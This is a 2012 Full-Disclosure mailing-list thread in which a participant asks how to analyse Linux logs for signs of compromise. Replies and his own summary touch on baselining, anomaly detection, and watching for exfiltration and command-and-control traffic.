[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Linux - Indicators of compromise
- To: "Benji " <me@xxxxxxxxx>
- Subject: Re: [Full-disclosure] Linux - Indicators of compromise
- From: "Ali Varshovi " <ali.varshovi@xxxxxxxxxxx>
- Date: Tue, 17 Jul 2012 00:58:16 +0000
I wasn't initially, but that's where the discussion is taking me. I was
thinking of collecting local logs from a Linux box and analyze them to
determine if its been compromised or not. I understand a hybrid approach should
be taken, including pattern detection to capture known malware/backdoors and a
behavioral analysis to tag any abnormal behavior.
Michael mentioned a very true and good point that theoretically logs and
behavior of a compromised system cannot be trusted. Other folks, also pointed
that a data exfilteration usually follows a compromise and can be considered as
a shared pattern for majority of attacks (I want to add command/control traffic
myself).
Friends, is that a good summary of a high level approach?
Cheers,
Ali
.
---------------------------------------------
Sent from my BlackBerry device
-----Original Message-----
From: Benji <me@xxxxxxxxx>
Date: Tue, 17 Jul 2012 00:31:12
To: <ali.varshovi@xxxxxxxxxxx>
Cc: <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: Re: [Full-disclosure] Linux - Indicators of compromise
SO you're talking about making a baseline?
On Mon, Jul 16, 2012 at 7:52 PM, Ali Varshovi <ali.varshovi@xxxxxxxxxxx> wrote:
> Hello everybody and thank you for your useful comments.
>
> Now I'm thinking that we need a comparison base or normal behavior profile to
> be able to detect any deviations or abnormal/suspicious activity. While some
> known patterns of behaviors are useful to detect malware or backdoors we
> still need that normal profile to detect 0-day or APT style intrusions. Isn't
> that the same idea from early days of intrusion detection research (anomaly
> detection approach)? Or maybe I'm off track.
>
> Thoughts?
>
> ------Original Message------
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Subject: Linux - Indicators of compromise
> Sent: Jul 14, 2012 8:46 AM
>
> Greetings FD,
>
> Does anyone have any guidelines/useful material on analysis logs of a Linux
> machine to detect signs of compromise? The data collection piece is not a
> challenge as a lot of useful information can be captured using commands and
> some scripts. I'm wondering if there is any systematic approach to analyze
> the collected logs? Most of the materials I've seen are more aligned to
> malware and rootkit detection which is not the only concern apparently.
>
> Thanks,
>
> Ali
> .
> ---------------------------------------------
> Sent from my BlackBerry device
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/